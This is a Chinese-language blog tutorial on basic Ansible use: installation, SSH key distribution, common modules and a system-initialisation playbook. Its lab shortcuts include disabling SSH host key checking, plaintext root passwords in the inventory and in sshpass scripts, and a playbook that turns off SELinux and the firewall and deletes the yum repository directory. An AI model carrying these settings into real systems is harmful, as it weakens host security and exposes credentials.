不知道灬都不知道

Ansible自动部署（基础篇）

一、ansible简介

1、ansible介

Ansible这个名字来源于科幻小说，是一种超光速通讯设备。在Linux中，ansible是新出现的自动化运维工具，基于Python开发，集合了众多运维工具（puppet、cfengine、chef、func、fabric）的优点，实现了批量系统配置、批量程序部署、批量运行命令等功能。支持linux、BSD、MacOS、等，支持openstack 、docker等结合使用。

2、ansible架构

2.1 Ansible核心组件说明：

Ansible：Ansible的核心程序
Host Inventory：记录了每一个由Ansible管理的主机信息，信息包括ssh端口，root帐号密码，ip地址等等。可以通过file来加载，可以通过CMDB加载
Playbooks：YAML格式文件，多个任务定义在一个文件中，使用时可以统一调用，“剧本”用来定义那些主机需要调用那些模块来完成的功能.
Core Modules：Ansible执行任何管理任务都不是由Ansible自己完成，而是由核心模块完成；Ansible管理主机之前，先调用core Modules中的模块，然后指明管理Host Lnventory中的主机，就可以完成管理主机。
Custom Modules：自定义模块，完成Ansible核心模块无法完成的功能，此模块支持任何语言编写。
Connection Plugins：连接插件，Ansible和Host通信使用

2.2 Ansible工作流程：

Ansile----->host(主机资源定义)------>模块（核心模块/自定义模块）------>插件（ssh）

2.3 Ansible 特性

no agent 不需要安装客户端（支持ssh）
no server 不需要启动服务（ansible）
基于模块工作，可以使用任意语言开发模块
基于ssh工作( 基于密钥认证)
YAML格式，编排任务，支持丰富的数据结构（剧本playbook）
使用python编写，维护简单

二、Ansible安装部署

1、ansible安装

升级ssh

[root@ansible ~]# yum update openssh

...

Updated:
  openssh.x86_64 0:5.3p1-123.el6_9                   

Dependency Updated:
  openssh-clients.x86_64 0:5.3p1-123.el6_9           
  openssh-server.x86_64 0:5.3p1-123.el6_9            

Complete!
//升级完成

安装ansible

[root@ansible ~]# yum install -y ansible

......

Installed:
  ansible.noarch 0:2.5.5-1.el6                       

Dependency Installed:
  PyYAML.x86_64 0:3.10-3.1.el6                       
  libyaml.x86_64 0:0.1.3-4.el6_6                     
  python-babel.noarch 0:0.9.4-5.1.el6                
  python-crypto.x86_64 0:2.0.1-22.el6                
  python-crypto2.6.x86_64 0:2.6.1-2.el6              
  python-httplib2.noarch 0:0.7.7-1.el6               
  python-jinja2-26.noarch 0:2.6-3.el6                
  python-keyczar.noarch 0:0.71c-1.el6                
  python-markupsafe.x86_64 0:0.9.2-4.el6             
  python-paramiko.noarch 0:1.7.5-4.el6_9             
  python-pyasn1.noarch 0:0.0.12a-1.el6               
  python-setuptools.noarch 0:0.6.10-4.el6_9          
  python-simplejson.x86_64 0:2.0.9-3.1.el6           
  python-six.noarch 0:1.9.0-2.el6                    
  sshpass.x86_64 0:1.06-1.el6                        

Complete!

//安装完成

2、ansible配置使用

2.1 ansible配置文件

[root@ansible ~]# rpm -qc ansible              //查看有哪些配置文件
/etc/ansible/ansible.cfg
/etc/ansible/hosts                             //主机配置文件

2.2 ansible免密连接认证

方法一：配置ssh密钥

//如果主机数量较少,可以直接复制
[root@ansible ~]# ssh-keygen -t rsa 
[root@ansible ~]# ssh-copy-id -i  192.168.137.133

//如果主机较多，可以使用批量复制的方式
1、解决连接新主机时，进行公钥确认问题
方法一：在配置文件中修改 （当前用户家目录.ssh/config，没有则自行创建）
StrictHostKeyChecking=no
方法二：在复制密钥时增加参数
ssh-copy-id -o StrictHostKeyChecking=no root@IP

2、解决验证时，非交互式输入密码问题
sshpass命令（若系统没有，需要自行安装）
sshpass -p 'YOUR_PASSWORD' ssh-copy-id root@IP

3、设置完成后用脚本批量传递秘钥

  1 #!/bin/bash

  2 
  3 for host in $(cat remote-hosts)
  4 do
  5         /usr/bin/sshpass -p '123456' ssh-copy-id  root@${host}
  6 done

  //创建一个文件remote-hosts ,将主机ip放入文件中
  //如果密码每台都不同，需要将密码用正则取出,传递给变量

注意： 如果已经将StrictHostKeyChecking=no 写入配置文件/root/.ssh/config 中，就不要在命令行中再写一次，可能会报错，错误如下：

command-line: line 0: Bad configuration option: exec
command-line: line 0: Bad configuration option: exec

方法二：在ansible的hosts中设定

[web]
server01-137-14.yu.net ansible_ssh_host=192.168.137.14 ansible_ssh_user=root ansible_ssh_pass=123456
//指定域名对应的IP，用户和密码，这样就不用做ssh免密了
//注意StrictHostKeyChecking=no这项也要配置，才能通过，这项在/etc/ssh/ssh_config中也有
#   StrictHostKeyChecking ask  改为
StrictHostKeyChecking no

//测试
[root@ansible ~]# ansible web -m ping
server01-137-14.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

2.3 ansible 免密认证可能出现的问题

初次使用ansible出现的问题

[root@ansible ~]# ansible mysql -m ping

paramiko: The authenticity of host 'mysql02.yu.net' can't be established.
The ssh-rsa key fingerprint is 4a6aab0478058f324688426c732c660e.
Are you sure you want to continue connecting (yes/no)?
yes

paramiko: The authenticity of host 'mysql03.yu.net' can't be established.
The ssh-rsa key fingerprint is 0134343743600531ff38afc7b4851e0f.
Are you sure you want to continue connecting (yes/no)?
yes

paramiko: The authenticity of host 'mysql01.yu.net' can't be established.
The ssh-rsa key fingerprint is 930535c64203f5681b0c5826175fbb74.
Are you sure you want to continue connecting (yes/no)?
mysql02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql03.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

mysql01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

出现问题原因：

虽然配置了ssh免密，且ssh免密没有问题，但是初次使用ansible还是需要确认主机，也就是说缺少/root/.ssh/known_hosts 这个文件。所以在第一次部署时必须确认一次。如果不想手动确认，可以用expect编写脚本来确认。
解决方案

  1 #!/usr/bin/bash
  2 # copy the ssh-key to all hosts
  3 #$1=host_name $2=password_server
  4 #v3
  5 
  6 for host in `grep "$1" /etc/hosts |awk '{print $1}'`
  7 do
  8         /usr/bin/sshpass -p "$2" ssh-copy-id root@${host}
  9 
 10 done
 11 
 12 /usr/bin/expect <<-EOF
 13         spawn   /usr/bin/ansible $1 -m ping
 14         expect {
 15                 "yes/no" { send "yes\r"; exp_continue }
 16         }
 17         expect eof
 18 EOF


1. 在执行完分发秘钥的任务后，再执行一次ansible的ping模块，同时使用expect来自动答复，经过这个过程后，主机间就会完成认证。
2. expect 需要自行安装。
3. 注意命令使用绝对路径。

2.4 ansible配置

配置ansible hosts文件（不是/etc/hosts文件）

  1 # This is the default ansible 'hosts' file    .
  2 #
  3 # It should live in /etc/ansible/hosts
  4 #
......
 45 [web]
 46 server01-137-14.yu.net ansible_ssh_host=192.168.137.14 ansible_ssh_user=root ansible_ssh_pass=123456

//web是hosts文件中主机标签，可以是IP，也可以是主机名，后面可以加各个配置项

测试连接（通过模块）

[root@ansible ~]# ansible web -m ping
server01-137-14.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

注意：
1、测试时使用的ping是指ansible的ping模块，而不是ping命令。
2、这里测试的只是远程主机是否存在。

三、ansible实践

1、实验环境

主机名	IP	备注
ansible.yu.net	192.168.137.133
mysql01.yu.net	192.168.137.139
mysql02.yu.net	192.168.137.140
mysql03.yu.net	192.168.137.137
web01.yu.net	192.168.137.135
web02.yu.net	192.168.137.136

注：系统版本是CentOS release 6.5 (Final)

2、ansible的命令行使用方式

2.1 命令格式

# ansible <PATTERN> -m <module_name> -a <arguments>

2.2 PATTERN 写法

某一个主机组如：mysql

[root@ansible ~]# ansible mysql -m ping
mysql03.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

所有主机 all

[root@ansible scripts]# ansible all -m ping 
web01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
web02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql03.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

多个主机或IP用“：”隔开

[root@ansible scripts]# ansible mysql03.yu.net:mysql02.yu.net -m ping
mysql03.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

用通配符匹配

[root@ansible scripts]# ansible mysql*.yu.net  -m ping
mysql03.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
mysql02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

注：

1、这些匹配到的主机一定是/etc/ansible/hosts 文件里有的才能匹配到。

2、推荐用组的形式管理主机，更加方便。

2.3 模块使用方法

2.3.1 查看支持的模块

[root@ansible ~]# ansible-doc -l
a10_server                                          
a10_server_axapi3                                   
a10_service_group                                   
a10_virtual_server                                  
accelerate                                               
...

2.3.2 查看模块使用方法

[root@ansible ~]# ansible-doc a10_server
> A10_SERVER    (/usr/lib/python2.6/site-packages/an

        Manage SLB (Server Load Balancer) server obj
        Networks devices via aXAPIv2.

OPTIONS (= is mandatory):

- client_cert
        PEM formatted certificate chain file to be u
        authentication. This file can also include t
        and if the key is included, `client_key' is 
        [Default: (null)]
...

2.3.3 ping 模块

作用：测试管理端与被管理端连接状况（并不等于ping命令）

[root@ansible ~]# ansible web -m ping
web01.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}
web02.yu.net | SUCCESS => {
    "changed": false, 
    "ping": "pong"
}

2.3.4 user模块

作用：管理远程主机上用户的账号
参数：
- name：指定要管理的账号名称
- state：present（创建）|absent（删除）
- system：yes|no 是否为系统账号
- uid：指明用户UID
- group：指明用户的基本组
- groups：指明用户附加组
- shell：指明默认shell
- home：指明用户家目录
- move_home：yes|no 当home设定了家目录，如果创建的家目录已存在，是否将家目录移动
- password：指明用户密码
- comment：指明用户注释信息
- remove：删除用户时，是否要删除用户家目录

[root@ansible ~]# ansible web -m user  -a 'name=Tom uid=666 shell=/bin/bash state=present comment="user Tom"'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "comment": "user Tom", 
    "create_home": true, 
    "group": 666, 
    "home": "/home/Tom", 
    "name": "Tom", 
    "shell": "/bin/bash", 
    "state": "present", 
    "system": false, 
    "uid": 666
}
web02.yu.net | SUCCESS => {
    "changed": true, 
    "comment": "user Tom", 
    "create_home": true, 
    "group": 666, 
    "home": "/home/Tom", 
    "name": "Tom", 
    "shell": "/bin/bash", 
    "state": "present", 
    "system": false, 
    "uid": 666
}
//创建成功

//检查
[root@web01 ~]# tail -3 /etc/passwd
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Tom:x:666:666:user Tom:/home/Tom:/bin/bash

[root@web02 ~]# tail -3 /etc/passwd
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Tom:x:666:666:user Tom:/home/Tom:/bin/bash

2.3.5 group 模块

作用：用来添加或删除远端主机的用户组
参数：
- name：被管理的组名
- state： present（添加）|absent （删除）不指名，默认为添加
- gid：指明组ID
- system： yes|no 是否为系统组

[root@ansible ~]# ansible web -m group -a 'name=animal gid=555 state=present'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "gid": 555, 
    "name": "animal", 
    "state": "present", 
    "system": false
}
web02.yu.net | SUCCESS => {
    "changed": true, 
    "gid": 555, 
    "name": "animal", 
    "state": "present", 
    "system": false
}

[root@web01 ~]# tail -3 /etc/group
sshd:x:74:
Tom:x:666:
animal:x:555:Tom

[root@web02 ~]# tail -3 /etc/group
sshd:x:74:
Tom:x:666:
animal:x:555:Tom

2.3.6 file模块

作用：用于设定远程主机上的文件属性（不能创建文件，但是可以创建文件夹和软链接）
参数：
- path：指明哪个文件
- src：用于path指明的文件是软链接文件，其对应的源文件是谁，必须要在state=link时才有用
- state：directory|link|absent|file 指出创建的文件是目录还是软连接
- owner：属主
- group：属组
- mode：文件权限

需求：在/tmp目录中创建/root/file_source的软连接文件file_dest，并修改其文件属性为755

[root@ansible ~]# ansible web01.yu.net -m file -a 'path=/tmp/file_dest state=link src=/root/file_source mode=755'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "dest": "/tmp/file_dest", 
    "gid": 0, 
    "group": "root", 
    "mode": "0777", 
    "owner": "root", 
    "size": 17, 
    "src": "/root/file_source", 
    "state": "link", 
    "uid": 0
}

//web01上检查
[root@web01 ~]# cd /tmp/
[root@web01 tmp]# ll
total 0
lrwxrwxrwx  1 root root 17 Aug 23 11:54 file_dest -> /root/file_source    // 测试成功
-rw-------. 1 root root  0 Jul 14 14:15 yum.log

2.3.7 copy模块

作用：拷贝ansible管理端文件到远程主机指定位置
参数：
- dest：目标目录位置，使用绝对路径，如果源是目录，目标也要是目录，如果文件已经存在，会覆盖原有内容
- src：指源路径（管理端）如果源路径是目录，目标也要是目录
- mode：指明文件权限
- owner：指明属主
- group：指明属组
- content：指明复制到目标主机上的内容，不能与src一起使用，相当于复制content指明的数据，到目标文件中。

[root@ansible ~]# ansible web -m copy -a 'src=/root/ansible_test.txt dest=/tmp/ mode=755 owner=Tom'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "fb59b25b7fe6b4ca0c6a48acd125b4052deab7e9", 
    "dest": "/tmp/ansible_test.txt", 
    "gid": 0, 
    "group": "root", 
    "md5sum": "6031be4ce171ac11dd7fd9df985ee4f3", 
    "mode": "0755", 
    "owner": "Tom", 
    "size": 21, 
    "src": "/root/.ansible/tmp/ansible-tmp-1535008709.0-164426125312085/source", 
    "state": "file", 
    "uid": 666
}
web02.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "fb59b25b7fe6b4ca0c6a48acd125b4052deab7e9", 
    "dest": "/tmp/ansible_test.txt", 
    "gid": 0, 
    "group": "root", 
    "md5sum": "6031be4ce171ac11dd7fd9df985ee4f3", 
    "mode": "0755", 
    "owner": "Tom", 
    "size": 21, 
    "src": "/root/.ansible/tmp/ansible-tmp-1535008709.0-206707679338359/source", 
    "state": "file", 
    "uid": 666
}

//测试
[root@web01 tmp]# ll
total 4
-rwxr-xr-x  1 Tom  root 21 Aug 23 15:18 ansible_test.txt

[root@web02 tmp]# ll
total 4
-rwxr-xr-x  1 Tom  root 21 Aug 23 15:18 ansible_test.txt

//直接写入内容
[root@ansible ~]# ansible web -m copy -a 'content="hello ansible" dest=/tmp/file1 mode=755 owner=Tom'
web02.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "7b320b1dc0c867516cf00728df488daa3532bc1f", 
    "dest": "/tmp/file1", 
    "gid": 0, 
    "group": "root", 
    "md5sum": "37bc018071eae9a0e879c31b2f9aa554", 
    "mode": "0755", 
    "owner": "Tom", 
    "size": 13, 
    "src": "/root/.ansible/tmp/ansible-tmp-1535010466.83-147620108230697/source", 
    "state": "file", 
    "uid": 666
}
web01.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "7b320b1dc0c867516cf00728df488daa3532bc1f", 
    "dest": "/tmp/file1", 
    "gid": 0, 
    "group": "root", 
    "md5sum": "37bc018071eae9a0e879c31b2f9aa554", 
    "mode": "0755", 
    "owner": "Tom", 
    "size": 13, 
    "src": "/root/.ansible/tmp/ansible-tmp-1535010466.82-92220590094473/source", 
    "state": "file", 
    "uid": 666
}

[root@web01 tmp]# ls
ansible_test.txt  file1  file_dest  yum.log
[root@web02 tmp]# ls
ansible_test.txt  file1  yum.log
[root@web02 tmp]# cat file1 
hello ansible[root@web02 tmp]#

2.3.8 shell 模块

作用：在被管理端执行shell命令，支持重定向，管道符
参数：
- chdir：执行命令前切换到指定目录

[root@ansible ~]# ansible web -m shell -a "ps -ef |grep httpd"
web01.yu.net | SUCCESS | rc=0 >>
root       2249   2248  0 16:01 pts/1    00:00:00 /bin/sh -c ps -ef |grep httpd
root       2251   2249  0 16:01 pts/1    00:00:00 grep httpd

web02.yu.net | SUCCESS | rc=0 >>
root       1903   1902  0 16:01 pts/1    00:00:00 /bin/sh -c ps -ef |grep httpd
root       1905   1903  0 16:01 pts/1    00:00:00 grep httpd

注：可以与下面的command对比记忆

2.3.9 command 模块

作用：在被管理端执行命令（不支持管道符和重定向）
参数：
- chdir：执行命令前切换到指定目录

[root@ansible ~]# ansible web01.yu.net -m command -a "ls chdir=/root"
web01.yu.net | SUCCESS | rc=0 >>
anaconda-ks.cfg
file_source
install.log
install.log.syslog

2.3.10 yum模块

作用：基于yum机制，对远程主机管理程序包
参数：
- name：包名，可以指定版本，默认为最新版
- state：present（安装）|lastest（最新版本）|absent（卸载）
- disablerepo：在用yum安装时，临时禁用某个仓库，仓库ID（可以用yum repolist查看）
- enablerepo：在用yum安装时，临时启用某个仓库
- disable_gpg_check： yes|no 是否启用gpgcheck

[root@ansible yum.repos.d]# ansible web -m yum -a 'name=nginx state=present '
web02.yu.net | SUCCESS => {
    "changed": true, 
    "msg": "", 
    "rc": 0, 
    "results": [
...
web01.yu.net | SUCCESS => {
    "changed": true, 
    "msg": "", 
    "rc": 0, 
    "results": [
...

//检查
[root@ansible yum.repos.d]# ansible web -m shell -a 'rpm -q nginx '
 [WARNING]: Consider using the yum, dnf or zypper module rather than running rpm.  If you need to use
command because yum, dnf or zypper is insufficient you can add warn=False to this command task or set
command_warnings=False in ansible.cfg to get rid of this message.

web02.yu.net | SUCCESS | rc=0 >>
nginx-1.10.2-1.el6.x86_64

web01.yu.net | SUCCESS | rc=0 >>
nginx-1.10.2-1.el6.x86_64

//安装成功

2.3.11 service 模块

作用：远程管理主机上的服务模块
参数：
- name ：服务名
- state：started|stopped|restarted
- enabled：yes|no 是否开机启动
- runlevel ：开机启动运行在哪些级别下

[root@ansible ~]# ansible web -m service -a 'name=nginx state=started enabled=yes runlevel=35'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "enabled": true, 
    "name": "nginx", 
    "state": "started"
}
web02.yu.net | SUCCESS => {
    "changed": true, 
    "enabled": true, 
    "name": "nginx", 
    "state": "started"
}

//检查 
[root@ansible ~]# ansible web -m shell -a 'ps -ef |grep 80'
web01.yu.net | SUCCESS | rc=0 >>
root        803      2  0 10:05 ?        00:00:00 [ipoib]
root       2718   2717  0 17:36 pts/1    00:00:00 /bin/sh -c ps -ef |grep 80
root       2720   2718  0 17:36 pts/1    00:00:00 grep 80

web02.yu.net | SUCCESS | rc=0 >>
root       2280   2279  0 17:36 pts/1    00:00:00 /bin/sh -c ps -ef |grep 80
root       2281   2280  0 17:36 pts/1    00:00:00 ps -ef
root       2282   2280  0 17:36 pts/1    00:00:00 grep 80

2.3.12 Uri模块

作用：用于直接请求web服务器某个网页
参数：
- url ：指明请求的url路径
- user：请求的url如果需要认证，认证的用户名是什么
- password：请求的url如果需要认证，认证的密码是什么
- method：指明请求方式，如GET, POST, PUT, HEAD, DELETE, OPTIONS, PATCH, TRACE, CONNECT, REFRESH(必须大写)

[root@ansible ~]# ansible web -m uri -a 'url=http://192.168.137.135 method=GET' 
web02.yu.net | SUCCESS => {
    "accept_ranges": "bytes", 
    "changed": false, 
    "connection": "close", 
    "content_length": "3698", 
    "content_type": "text/html", 
    "cookies": {}, 
    "cookies_string": "", 
    "date": "Fri, 24 Aug 2018 00:49:49 GMT", 
    "etag": "\"58173b0b-e72\"", 
    "last_modified": "Mon, 31 Oct 2016 12:37:31 GMT", 
    "msg": "OK (3698 bytes)", 
    "redirected": false, 
    "server": "nginx/1.10.2", 
    "status": 200, 
    "url": "http://192.168.137.135"
}
web01.yu.net | SUCCESS => {
    "accept_ranges": "bytes", 
    "changed": false, 
    "connection": "close", 
    "content_length": "3698", 
    "content_type": "text/html", 
    "cookies": {}, 
    "cookies_string": "", 
    "date": "Fri, 24 Aug 2018 00:49:49 GMT", 
    "etag": "\"58173b0b-e72\"", 
    "last_modified": "Mon, 31 Oct 2016 12:37:31 GMT", 
    "msg": "OK (3698 bytes)", 
    "redirected": false, 
    "server": "nginx/1.10.2", 
    "status": 200, 
    "url": "http://192.168.137.135"
}

2.3.13 cron模块

作用：设置计划任务
参数：
- minute,hour,day,mouth,weekday: 分别对应计划任务的分，时，日，月，周（要分开写，不能写一行）
- reboot ：指明计划任务的执行时间为每次重启后
- name：为计划任务起名，每个任务名称不能一样
- job：执行的任务是什么，当state=present时才有意义
- state：present|absent 表示任务是创建还是删除，present表示创建，absent是删除，默认是present

[root@ansible ~]# ansible web -m cron -a 'minute=*/5 state=present name=date job="/usr/sbin/ntpdate 120.25.108.11 &>/dev/null"'
web02.yu.net | SUCCESS => {
    "changed": true, 
    "envs": [], 
    "jobs": [
        "date"
    ]
}
web01.yu.net | SUCCESS => {
    "changed": true, 
    "envs": [], 
    "jobs": [
        "date"
    ]
}

//检测
[root@ansible ~]# ansible web -m shell -a "crontab -l"

web01.yu.net | SUCCESS | rc=0 >>
#Ansible: date
*/5 * * * * /usr/sbin/ntpdate 120.25.108.11 &>/dev/null

web02.yu.net | SUCCESS | rc=0 >>
#Ansible: date
*/5 * * * * /usr/sbin/ntpdate 120.25.108.11 &>/dev/null

2.3.15 hostname 模块

作用：管理主机名
参数：
- name：指明主机名（永久修改）

[root@ansible ~]# ansible web01.yu.net -m hostname -a 'name=web03.yu.net'
web01.yu.net | SUCCESS => {
    "ansible_facts": {
        "ansible_domain": "yu.net", 
        "ansible_fqdn": "web03.yu.net", 
        "ansible_hostname": "web03", 
        "ansible_nodename": "web03.yu.net"
    }, 
    "changed": true, 
    "name": "web03.yu.net"
}

2.3.16 script 模块

作用：将管理端的脚本，移动到远端主机（不需指明路径），系统会自动移动，执行。一般是移动到/root/.ansible/tmp 下，然后自动给予其权限，然后再开个子shell运行，运行后删除脚本。

[root@ansible ~]# cat test.sh 
#!/bin/bash
echo "hello,ansible" >/tmp/ansible_script.txt
[root@ansible ~]# ansible web -m script -a '/root/test.sh'
web02.yu.net | SUCCESS => {
    "changed": true, 
    "rc": 0, 
    "stderr": "", 
    "stderr_lines": [], 
    "stdout": "", 
    "stdout_lines": []
}
web01.yu.net | SUCCESS => {
    "changed": true, 
    "rc": 0, 
    "stderr": "", 
    "stderr_lines": [], 
    "stdout": "", 
    "stdout_lines": []
}

//测试
[root@ansible ~]# ansible web -m shell -a 'cat /tmp/ansible_script.txt'
web02.yu.net | SUCCESS | rc=0 >>
hello,ansible

web01.yu.net | SUCCESS | rc=0 >>
hello,ansible

2.3.17 setup 模块

作用：收集远程主机信息（内核，操作系统，cpu等），需要时，直接调用即可

[root@ansible ~]# ansible web -m setup > /tmp/setup.txt
web01.yu.net | SUCCESS => {
"ansible_facts": {
   "ansible_all_ipv4_addresses": [
   "192.168.137.135"
   ],
   "ansible_all_ipv6_addresses": [
   "fe80::20c:29ff:fee4:b423"
   ]
   "ansible_apparmor": {
   "status": "disabled"
...

2.3.18 fetch 模块

作用：从远程主机拉取数据
参数：
- dest：从远程主机上拉取的文件存放在本地的位置，一般只能是目录
- src= ：指明远程主机上要拉取的文件，只能是文件，不能是目录

[root@ansible ~]# ansible web -m fetch -a 'src=/etc/hosts dest=/root'
web01.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "8a4e06f4db39707f47fa1db58954f977481fa2a8", 
    "dest": "/root/web01.yu.net/etc/hosts", 
    "md5sum": "4cab68d7daf7e70979423242114195c7", 
    "remote_checksum": "8a4e06f4db39707f47fa1db58954f977481fa2a8", 
    "remote_md5sum": null
}
web02.yu.net | SUCCESS => {
    "changed": true, 
    "checksum": "74b152f8ef49444ceba5f20f44de736cb4662a47", 
    "dest": "/root/web02.yu.net/etc/hosts", 
    "md5sum": "07788d5144f7e4e69ab31ab1885ad86e", 
    "remote_checksum": "74b152f8ef49444ceba5f20f44de736cb4662a47", 
    "remote_md5sum": null
}
[root@ansible ~]# ls
anaconda-ks.cfg   install.log.syslog
ansible_test.txt  test.sh
curl-test.sh      web01.yu.net
install.log       web02.yu.net

3、playbook使用方法

3.1 playbook 介绍

Playbooks 是定义ansible任务的配置文件，可以将多个任务定义在一个剧本中，由ansible自动执行，剧本执行支持多个任务，可以由控制主机运行多个任务，同时对多台远程主机进行管理。

3.2 playbook 基础组件

hosts：运行指定任务的目标主机，多个主机用“：”分隔。
remote_user：在远程主机上执行任务的用户，可以全局指定，也可以单个任务指定
sudo_user：表示sudo方式运行任务时，切换为哪个用户身份运行
tasks：任务列表
handlers：在发生改变时执行的操作

3.3 playbook 语法

ansible-playbook –syntax-check test.yml 测试文件语法
ansible-playbook –check test.yml 测试执行（不是正式执行）

3.4 playbook 案例

用于配置系统基本信息的playbook

---
- hosts: mysql
  remote_user: root
  tasks:
  - name: stop selinux
    shell: setenforce 0
  - name: configure the file of selinux config
  - name: stop iptables
    service: name=iptables state=stopped  enabled=no
  - name: copy rc.local
    copy: src=/etc/rc.local dest=/etc/rc.local          //若selinux未关，会报错
  - name: copy hosts
    copy: src=/etc/hosts dest=/etc/hosts
  - name: make directory /mnt/dvd                       //若已存在，会报错
    shell: mkdir /mnt/dvd                               
  - name: mount CDrom                                   //若已挂载，会报错
    shell: mount /dev/sr0 /mnt/dvd
  - name: rm /etc/yum.repos.d
    shell: rm -rf /etc/yum.repos.d/
  - name: configure yum
    copy: src=/etc/yum.repos.d dest=/etc/yum.repos.d
  - name: make memcache
    shell: yum clean all & yum makecache
  - name: install vim
    yum: name=vim state=present
  - name: install wget
    yum: name=wget state=present
  - name: install curl
    yum: name=curl state=present
  - name: install tree
    yum: name=tree state=present
  - name: install lrzsz telnet
    yum: name=telnet state=present

运行结果

[root@ansible ansible_playbook]# ansible-playbook os_init.yaml 

PLAY [mysql] *******************************************************************************************

TASK [Gathering Facts] *********************************************************************************
ok: [mysql01.yu.net]
ok: [mysql03.yu.net]
ok: [mysql02.yu.net]

TASK [stop iptables] ***********************************************************************************
ok: [mysql01.yu.net]
ok: [mysql03.yu.net]
ok: [mysql02.yu.net]

TASK [copy rc.local] ***********************************************************************************
changed: [mysql01.yu.net]
changed: [mysql02.yu.net]
changed: [mysql03.yu.net]

TASK [copy hosts] **************************************************************************************
changed: [mysql01.yu.net]
changed: [mysql02.yu.net]
changed: [mysql03.yu.net]

TASK [make directory /mnt/dvd] *************************************************************************
 [WARNING]: Consider using the file module with state=directory rather than running mkdir.  If you need
to use command because file is insufficient you can add warn=False to this command task or set
command_warnings=False in ansible.cfg to get rid of this message.

changed: [mysql01.yu.net]
changed: [mysql02.yu.net]
changed: [mysql03.yu.net]
......
PLAY RECAP *********************************************************************************************
mysql01.yu.net             : ok=12   changed=9    unreachable=0    failed=0   
mysql02.yu.net             : ok=12   changed=9    unreachable=0    failed=0   
mysql03.yu.net             : ok=12   changed=9    unreachable=0    failed=0

报错

TASK [copy rc.local] ***********************************************************************************
fatal: [mysql03.yu.net]: FAILED! => {"changed": false, "checksum": "ae15fe0530d07dd80da29903726da141617660be", "msg": "Aborting, target uses selinux but python bindings (libselinux-python) aren't installed!"}
fatal: [mysql01.yu.net]: FAILED! => {"changed": false, "checksum": "ae15fe0530d07dd80da29903726da141617660be", "msg": "Aborting, target uses selinux but python bindings (libselinux-python) aren't installed!"}
fatal: [mysql02.yu.net]: FAILED! => {"changed": false, "checksum": "ae15fe0530d07dd80da29903726da141617660be", "msg": "Aborting, target uses selinux but python bindings (libselinux-python) aren't installed!"}

//这个报错是因为selinux未关，如果关了以后，要重启机器

你可能感兴趣的:(Linux服务)

笋丁网页自动回复机器人V3.0.0免授权版源码希希分享软希网58soho_cn 源码资源笋丁网页自动回复机器人
笋丁网页机器人一款可设置自动回复，默认消息，调用自定义api接口的网页机器人。此程序后端语言使用Golang，内存占用最高不超过30MB，1H1G服务器流畅运行。仅支持Linux服务器部署，不支持虚拟主机，请悉知！使用自定义api功能需要有一定的建站基础。源码下载：https://download.csdn.net/download/m0_66047725/89754250更多资源下载：关注我。安
NPM私库搭建-verdaccio（Linux） Beam007 npm linux 前端
1、安装nodelinux服务器安装nodea)、官网下载所需的node版本https://nodejs.org/dist/v14.21.0/b)、解压安装包若下载的是xxx.tar.xz文件，解压命令为tar-xvfxxx.tar.xzc)、修改环境变量修改：/etc/profile文件#SETPATHFORNODEJSexportNODE_HOME=NODEJS解压安装的路径exportPAT
Android shell 常用 debug 命令晨春计 Audio debug android linux
目录1、查看版本2、am命令3、pm命令4、dumpsys命令5、sed命令6、log定位查看APK进程号7、log定位使用场景1、查看版本1.1、Android串口终端执行getpropro.build.version.release#获取Android版本uname-a#查看linux内核版本信息uname-r#单独查看内核版本1.2、linux服务器执行lsb_release-a#查看Lin
如何重启Linux服务器？老男孩IT教育 git linux 运维
在Linux操作系统中，提供了多种方法用于重启服务器，那么Linux服务器如何重启?以下列举了常用的几种方法，希望对大家有所帮助，快来看看吧。重启Linux服务器有以下几种方法：1、使用命令行使用reboot命令reboot使用shutdown命令shutdown-rnow2、使用systemctl使用以下命令：systemctlreboot3、使用web界面大多数现代Linux发行版本都提供一个
服务器状态监控php源码,服务器状态监控_监控Linux服务器网站状态的SHELL脚本温糯米服务器状态监控php源码
摘要腾兴网为您分享:监控Linux服务器网站状态的SHELL脚本，蜗牛集市，同花顺，探客宝，手柄助手等软件知识，以及日期倒计时插件，云南省教育资源公共，rui手机桌面，小屁孩桌面便签，合金装备崛起复仇，朝夕日历，photoshop图像处理软件,一年级学生每日计划表，悟空找房，饿了吗外卖商家版，逃生，中国民宿网，realpolitiks，交通安全知识竞赛，雅思流利说等软件it资讯，欢迎关注腾兴网。1
Linux搭建Java环境之jdk1.8安装图文教程 yundashi168 Java教程阿里云教程
